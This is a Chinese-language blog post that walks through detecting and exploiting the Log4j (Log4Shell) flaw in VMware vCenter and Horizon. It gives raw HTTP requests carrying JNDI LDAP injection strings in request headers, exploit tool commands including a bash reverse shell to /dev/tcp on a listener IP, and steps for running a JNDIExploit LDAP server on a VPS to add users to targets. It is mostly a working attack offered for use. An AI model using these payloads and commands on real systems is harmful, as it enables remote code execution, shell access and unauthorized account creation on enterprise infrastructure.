首页 > 系统相关 >Vmware Vcenter&Vmware Horizon漏洞检测与利用一条龙

Vmware Vcenter&Vmware Horizon漏洞检测与利用一条龙

时间:2023-01-07 12:59:27浏览次数:53  
标签:https 漏洞 Sec Horizon Vcenter com Fetch Vmware

Vmware Vcenter&Vmware Horizon漏洞检测与利用一条龙

 

文章作者:[email protected]

 

1、Vmware Vcenter漏洞被动检测

我们可以利用BurpSuite软件结合插件对Vmware Vcenter漏洞进行被动检测:

BP版本:burpsuite_pro_v2021.2.jar及以上

插件名称及下载:https://github.com/whwlsfb/Log4j2Scan

 

插件配置:

//检测结果截图:

 

2、Vmware Vcenter漏洞利用

2.1手动重放位置:

GET /websso/SAML2/SLO/vsphere.local?SAMLRequest= HTTP/1.1

Host: yewuvc.adyz.com

Connection: close

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: cross-site

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=4AD782AC07223C668F2938F950B7BF38

X-Forwarded-For: ${jndi:ldap://2.29bthb.ceye.io}

 //dnslog平台回显截图,根据回显结果我们可以定位漏洞参数位置:

 

 

2.2 漏洞利用工具:

下载地址:https://github.com/Schira4396/VcenterKiller

命令:

vckiller_windows_amd64.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j

//反弹一句话后门:

vckiller_windows_amd64.exe -u https://192.168.10.16 -m log4center -t exec -c "/bin/bash -i >& /dev/tcp/192.168.10.58/8000 0>&1"

 

 

 

 

3、Vmware Horizon漏洞被动检测

3.1插件名称及下载:

https://github.com/f0ng/log4j2burpscanner

3.2检测结果截图

 

 

3.3 dnslog平台回显截图,根据回显结果我们可以定位漏洞参数位置:

Accept-Language: zh-CN,zh;q=0.9${jndi:ldap://5.GET.192.168.10.15.p.w.i.h.29bthb.ceye.io/%20test}

 

 

4、Vmware Horizon漏洞利用

4.1手动重放位置:

GET /portal/info.jsp  HTTP/1.1

Host: 192.168.10.15

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer:

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9${jndi:ldap://1.192.168.10.15.29bthb.ceye.io/%20test}

Content-Length: 2

4.2漏洞利用工具:

下载地址:

https://github.com/NS-Sp4ce/Vm4J

https://github.com/0x727/JNDIExploit

//登录VPS主机后运行如下命令绑定ldap服务:

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 47.93.XX.XX -l 8087

 

//下面是我们成功加入用户后登录终端桌面的相关截图:

 

标签:https,漏洞,Sec,Horizon,Vcenter,com,Fetch,Vmware
From: https://www.cnblogs.com/pt007/p/17032454.html

相关文章

  • VMware 虚拟机中 CentOS7 的硬盘空间扩容
    文章目录​​一、查看挂载点信息​​​​二、扩展硬盘空间​​​​三、对新增加的硬盘进行分区、格式化​​​​3.1分区生效​​​​3.2格式化分区​​​​四、添加新LVM......
  • Ventoy制作启动盘和使用VMware测试启动盘(论文版)
    -1Ventoy1.1 Ventoy是什么Ventoy是可用于制作启动U盘的开源工具,在占用少量引导分区容量后,其他空间依旧可以正常当一般的U盘读写文件。它的最大特点是只要将iso、win......
  • pve虚拟机Vmware安装教程
    1ProXmoX-VE简介PVE(ProXmoXVE)是一个开源的虚拟化管理软件,类似ESXI,用户可以通过网页的方式来管理服务器,使用kvm以及lxc技术运行虚拟机,同时也提供了一些集群和HA等功能。......
  • 原来是vmware-hostd程序占用了443端口
    查看电脑端口的时候发现本机有服务正在监听443端口我没有在本地运行任何web服务,为什么会监听443端口?操作:获取监听程序的PID:可以看到监听443端口的程序的PID为8380......
  • VMware Fusion Pro 13.0.0 最新序列号【转】
     Fusion简介VMwareFusion是最好的Windows-to-Mac解决方案,是任何平台上最强大的应用开发和测试工具。Fusion13支持macOS13.0,为开发者、IT管理员和普通用户提供了......
  • 在vmware启动anolis自制iso镜像出现 ERROR: could not insert 'floppy' : No such dev
    解决linux启动出现ERROR:couldnotinsert'floppy':Nosuchdevice报错如下:最后屏幕狂刷Warning:dracut-initqueuetimeout-startingtimeoutscript如下:......
  • vmware 安装centos7
    1.软硬件准备软件:推荐使用VMware,我用的是VMware12镜像:CentOS6,如果没有镜像可以在阿里云下载 https://mirrors.aliyun.com/centos/   硬件:因为是在宿主机上......
  • 软件安装——Windows7 VmWare Tools
    VMwareWin7    这里有个坑,在安装VMtools的时候,是失败的,我原来以为是镜像的问题,Windows7镜像版本如果比较低,是安装不了VMtools的。在尝试更换高版本Windows7后,我......
  • VMware ESXI 6.5安装
    一、硬件准备准备软件:推荐使用VMware,我用的是VMware 14镜像:VMware-VMvisor-Installer-6.5.0-5310538.x86_64-DellEMC_Customized-A04.iso硬件:因为是在宿主机上运行虚拟化软......
  • 开始使用 VMware Tanzu Mission Control 和 Tanzu Kubernetes Grid
    如今,运营和开发团队面临着越来越大的压力,他们需要更快地将软件部署到更多环境,例如开发、暂存或生产环境。组织需要自助服务工具和运营效率,而VMware正在通过解决方案来应对......